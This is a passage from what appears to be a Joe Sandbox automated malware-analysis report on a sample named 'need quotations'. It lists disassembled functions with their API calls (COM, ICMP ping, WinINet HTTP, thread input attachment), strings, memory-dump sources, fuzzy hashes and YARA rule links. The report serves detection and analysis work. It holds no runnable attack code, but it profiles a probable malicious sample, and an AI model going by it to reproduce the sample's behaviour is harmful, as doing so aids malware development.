VariantCopy.OLEAUT32(?,?), ref: 002795BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 002795D2
VariantClear.OLEAUT32(?), ref: 002795E7
SafeArrayDestroyData.OLEAUT32(?), ref: 002795F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002795FD
VariantClear.OLEAUT32(?), ref: 0027960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0027961A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 57920bc3d23ad3ad3377f1a4fec43c5cbde2c5c91f38bf4054b27d1575053d9a
Instruction ID: 6b8a4e8bac58a628221f9f01c8f6e5c271509280d77f8bd4016269bfd7f790e4
Opcode Fuzzy Hash: 57920bc3d23ad3ad3377f1a4fec43c5cbde2c5c91f38bf4054b27d1575053d9a
Instruction Fuzzy Hash: 79412C35910219AFCB15EFA4DC88DDEBB79FF08355F008065E906A3251DB70EA95CFA0

Function 0029BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0029BB5C
VariantInit.OLEAUT32(?), ref: 0029BC2D
VariantInit.OLEAUT32(?), ref: 0029BD2E
VariantClear.OLEAUT32(?), ref: 0029BD38
VariantClear.OLEAUT32(?), ref: 0029BD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0029BD11
|?/, xrefs: 0029BB34
h?/, xrefs: 0029BB2D
Null Object assignment in FOR..IN loop, xrefs: 0029BBBD, 0029BCEB, 0029BDA7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?/$|?/
API String ID: 2862541840-2835492252
Opcode ID: e2c5637f8faa1b603a4970ba0b7dba9aca5838066edc5a69e83d42413bf9e436
Instruction ID: fc4a52914d02019f649633e1eb68e5f32fc7984333ab7385104f7cc1507aba7f
Opcode Fuzzy Hash: e2c5637f8faa1b603a4970ba0b7dba9aca5838066edc5a69e83d42413bf9e436
Instruction Fuzzy Hash: 6291B371A20219AFDF25DF94DD44FAEB7B8EF45710F10815AF505AB280D7709954CFA0

Function 0029ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CoInitialize.OLE32 ref: 0029ADF6
CoUninitialize.OLE32 ref: 0029AE01
CoCreateInstance.OLE32(?,00000000,00000017,002CD8FC,?), ref: 0029AE61
IIDFromString.OLE32(?,?), ref: 0029AED4
VariantInit.OLEAUT32(?), ref: 0029AF6E
VariantClear.OLEAUT32(?), ref: 0029AFCF

Strings

Failed to create object, xrefs: 0029AE6C, 0029AF22
Invalid parameter, xrefs: 0029AEED
NULL Pointer assignment, xrefs: 0029AEA6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2f4673b29a39ee453621d8900002e3f521db386d62cc08ab04332ab863c1612a
Instruction ID: db5a11641b38f52abfc69ee9b0774f077ee421c0375d1f735c2fd791e4c19852
Opcode Fuzzy Hash: 2f4673b29a39ee453621d8900002e3f521db386d62cc08ab04332ab863c1612a
Instruction Fuzzy Hash: D461AC71228302AFDB11EF54D848B6ABBE8AF85714F00452DF9859B291C771ED64CBD3

Function 00298107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00298168
inet_addr.WSOCK32(?,?,?), ref: 002981AD
gethostbyname.WSOCK32(?), ref: 002981B9
IcmpCreateFile.IPHLPAPI ref: 002981C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00298237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0029824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 002982C2
WSACleanup.WSOCK32 ref: 002982C8

Strings

Ping, xrefs: 002981EB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8747c3eadf5055b12a2de62b724d761f61580f4d1988ed7abc2b95c5b3ef269e
Instruction ID: 7f9dff27c3bae37ac21b0a75b4c85c54952f7236375a11bc730de971a0008997
Opcode Fuzzy Hash: 8747c3eadf5055b12a2de62b724d761f61580f4d1988ed7abc2b95c5b3ef269e
Instruction Fuzzy Hash: E55192316246019FDB10EF24DC49B2AB7E4AF46710F18892AFE5ADB2A1DB70E915CF41

Function 0028E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0028E40C
GetLastError.KERNEL32 ref: 0028E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0028E483

Strings

UNKNOWN, xrefs: 0028E43B
NOTREADY, xrefs: 0028E442
READY, xrefs: 0028E45C
INVALID, xrefs: 0028E455
READONLY, xrefs: 0028E44E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f243ffe5f384fb78b8dc201130ddc04521fa2c58890d2781a1cdc43fde6ca83d
Instruction ID: ac98f35d41dde664dfeba0ff672970ba9e42e7489ee51eb8d505df8d9c67d03f
Opcode Fuzzy Hash: f243ffe5f384fb78b8dc201130ddc04521fa2c58890d2781a1cdc43fde6ca83d
Instruction Fuzzy Hash: FC319439A2120A9FDB01FF68D849EBDB7B4EF05304F158026E509A72D2D7B09911CB51

Function 0027B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0027B98C
GetDlgCtrlID.USER32 ref: 0027B997
GetParent.USER32 ref: 0027B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0027B9B6
GetDlgCtrlID.USER32(?), ref: 0027B9BF
GetParent.USER32(?), ref: 0027B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0027B9DE

Strings

ListBox, xrefs: 0027B949
ComboBox, xrefs: 0027B911

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 61a1bfab0463bcfa1b118a0a7e75effa5bcbbe3a95ddb3245e90a80b62703f80
Instruction ID: 0c4c7936fff784df78fa822f0326bba92eeafbfa656bcf419df359ba5cfa9a42
Opcode Fuzzy Hash: 61a1bfab0463bcfa1b118a0a7e75effa5bcbbe3a95ddb3245e90a80b62703f80
Instruction Fuzzy Hash: A121A475A10108AFDB05AFA4DC85EBEBB79EF45310B204115F665932A1DBB45825DF20

Function 0027B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0027BA73
GetDlgCtrlID.USER32 ref: 0027BA7E
GetParent.USER32 ref: 0027BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0027BA9D
GetDlgCtrlID.USER32(?), ref: 0027BAA6
GetParent.USER32(?), ref: 0027BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0027BAC5

Strings

ListBox, xrefs: 0027BA32
ComboBox, xrefs: 0027B9FA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 4fd44f21c848a45bf382ef126d82daa683aeb6e649d3fdfb8d746556661faa86
Instruction ID: 0cd2ff72cf708986eeab8253448bf74e863efaf6327eb9bd9bafe7a0cdc57d42
Opcode Fuzzy Hash: 4fd44f21c848a45bf382ef126d82daa683aeb6e649d3fdfb8d746556661faa86
Instruction Fuzzy Hash: 1821AFB4A10108BBDB05AFA4DC85EBEBB79EF45300F204025F955A32A1DBB5592ADF20

Function 0027BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0027BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0027BAF8
_wcscmp.LIBCMT ref: 0027BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0027BB85

Strings

smallicons, xrefs: 0027BB4D
details, xrefs: 0027BB33
list, xrefs: 0027BB67
SHELLDLL_DefView, xrefs: 0027BB04
largeicons, xrefs: 0027BB19

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 15d4fd64408a1bc1dd8b11a3d6942c0d0db877f42033aae3e7fe2b15496b4890
Instruction ID: 06663367ab5c4a9e9a6b1908e12fe5b7e4f878c56630af124f6a7b6d13d6f8f1
Opcode Fuzzy Hash: 15d4fd64408a1bc1dd8b11a3d6942c0d0db877f42033aae3e7fe2b15496b4890
Instruction Fuzzy Hash: C411EB76668307F9FA116A21AC06EA6775C9B12368B204022FE08E54D9EFB168715554

Function 0029B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0029B2D5
CoInitialize.OLE32(00000000), ref: 0029B302
CoUninitialize.OLE32 ref: 0029B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0029B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0029B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0029B56D
CoGetObject.OLE32(?,00000000,002CD91C,?), ref: 0029B590
SetErrorMode.KERNEL32(00000000), ref: 0029B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0029B623
VariantClear.OLEAUT32(002CD91C), ref: 0029B633

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 5353d5d03de00c6cd16b2c3f0b6d178e83cf70b6c5e768a3d034e7c6c06f7fa4
Instruction ID: 8c6207fe89206183dd65739c22819a3e1f0060218d431615959e2fa6c464e5e6
Opcode Fuzzy Hash: 5353d5d03de00c6cd16b2c3f0b6d178e83cf70b6c5e768a3d034e7c6c06f7fa4
Instruction Fuzzy Hash: A5C13271618301AFDB05DF68D984A2BB7E9FF88308F00496DF98A9B251DB70ED15CB52

Function 0026ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0026ACC1

Part of subcall function 00267CF4: __mtinitlocknum.LIBCMT ref: 00267D06
Part of subcall function 00267CF4: EnterCriticalSection.KERNEL32(00000000,?,00267ADD,0000000D), ref: 00267D1F

__calloc_crt.LIBCMT ref: 0026ACD2

Part of subcall function 00266986: __calloc_impl.LIBCMT ref: 00266995
Part of subcall function 00266986: Sleep.KERNEL32(00000000,000003BC,0025F507,?,0000000E), ref: 002669AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0026ACED
GetStartupInfoW.KERNEL32(?,002F6E28,00000064,00265E91,002F6C70,00000014), ref: 0026AD46
__calloc_crt.LIBCMT ref: 0026AD91
GetFileType.KERNEL32(00000001), ref: 0026ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0026AE11

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: f0ebca9829b788a718109db16db14d18cb58c9944a63758101b43449a1e3b880
Instruction ID: 7c05939864de2ad8afad226d944591634acf644c5ac76d3bfc3a8e5b33495491
Opcode Fuzzy Hash: f0ebca9829b788a718109db16db14d18cb58c9944a63758101b43449a1e3b880
Instruction Fuzzy Hash: E081E2709263468FDB14CF68C8845A9BBF4AF05324F24426ED4A6BB3D1C7359892CF56

Function 00284025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00284047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,002830A5,?,00000001), ref: 0028405B
GetWindowThreadProcessId.USER32(00000000), ref: 00284062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 00284071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00284083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 0028409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 002840AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 002840F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 00284108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 00284113

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c574201a5c02ae96ef44500d4460ab0036ab8aff1efe6da647e81c4d4acd3b78
Instruction ID: a6e40fd65bebddfe64198a706dc225324926778794e77f7b2ffe8858b2141ae9
Opcode Fuzzy Hash: c574201a5c02ae96ef44500d4460ab0036ab8aff1efe6da647e81c4d4acd3b78
Instruction Fuzzy Hash: 0F31C375512206AFEB11FF54EC4DF6AB7ADAB50311F108026F908E62D4DBB4A980CB60

Function 002BDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0025B496
SetTextColor.GDI32(?,000000FF), ref: 0025B4A0
SetBkMode.GDI32(?,00000001), ref: 0025B4B5
GetStockObject.GDI32(00000005), ref: 0025B4BD
GetClientRect.USER32(?), ref: 002BDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 002BDD7A
GetWindowDC.USER32(?), ref: 002BDD86
GetPixel.GDI32(00000000,?,?), ref: 002BDD95
ReleaseDC.USER32(?,00000000), ref: 002BDDA7
GetSysColor.USER32(00000005), ref: 002BDDC5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 340674391d441533834e0335077d9ef2e6235fffede3ceac772542fcc7d3e5f5
Instruction ID: 5164c174876faccbab80e267ab40039b5ed738fc942c766d87d8bcb66e6f33a7
Opcode Fuzzy Hash: 340674391d441533834e0335077d9ef2e6235fffede3ceac772542fcc7d3e5f5
Instruction Fuzzy Hash: 4A117C31510206AFDB216FA4FC0CFE97B65EB04366F648635FA6A950E1CB710951DF20

Function 00243093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002430DC
CoUninitialize.OLE32(?,00000000), ref: 00243181
UnregisterHotKey.USER32(?), ref: 002432A9
DestroyWindow.USER32(?), ref: 002B5079
FreeLibrary.KERNEL32(?), ref: 002B50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002B5125

Strings

close all, xrefs: 002430D7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 2c479d9279f91bf0ed43fa8ddc4f27ceba2c423543ddd0d4ba52b88904b283e4
Instruction ID: c436d9cdc6f0e03301cb6c7b39651666123a5c0af4b0318998ccfc8b0d4c581d
Opcode Fuzzy Hash: 2c479d9279f91bf0ed43fa8ddc4f27ceba2c423543ddd0d4ba52b88904b283e4
Instruction Fuzzy Hash: 58912E34621112CFC719EF14D895FA8F3A4FF14344F5442A9E90AAB262DB70AE7ACF54

Function 0025CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0025CC15

Part of subcall function 0025CCCD: GetClientRect.USER32(?,?), ref: 0025CCF6
Part of subcall function 0025CCCD: GetWindowRect.USER32(?,?), ref: 0025CD37
Part of subcall function 0025CCCD: ScreenToClient.USER32(?,?), ref: 0025CD5F

GetDC.USER32 ref: 002BD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002BD14A
SelectObject.GDI32(00000000,00000000), ref: 002BD158
SelectObject.GDI32(00000000,00000000), ref: 002BD16D
ReleaseDC.USER32(?,00000000), ref: 002BD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002BD200

Strings

U, xrefs: 002BD0D5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 60da2faafb900d2c3a3eaa2b384889113d7abd28190799a3236d72222ac0e756
Instruction ID: e915237726c7838753557be66bea36bbc805d4d03c5d2155f30aa3fac2bd8649
Opcode Fuzzy Hash: 60da2faafb900d2c3a3eaa2b384889113d7abd28190799a3236d72222ac0e756
Instruction Fuzzy Hash: 68713730420206DFCF21DF28CC80AEA7BB5FF48395F24426AED59562A6E7318C65CF60

Function 002945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002945FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0029462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0029466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00294682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0029468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002946BF
InternetCloseHandle.WININET(00000000), ref: 00294706

Part of subcall function 00295052: GetLastError.KERNEL32(?,?,002943CC,00000000,00000000,00000001), ref: 00295067

Strings

, xrefs: 002946B8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 3145cb8cb84d74f860c8e26cbf489af42f849fc2ffa5b8787c0f4982ca1b7546
Instruction ID: 572aee47687ada6759bb56ef46822a4ac2d8aaa468819b67fd155b1f6c236a2d
Opcode Fuzzy Hash: 3145cb8cb84d74f860c8e26cbf489af42f849fc2ffa5b8787c0f4982ca1b7546
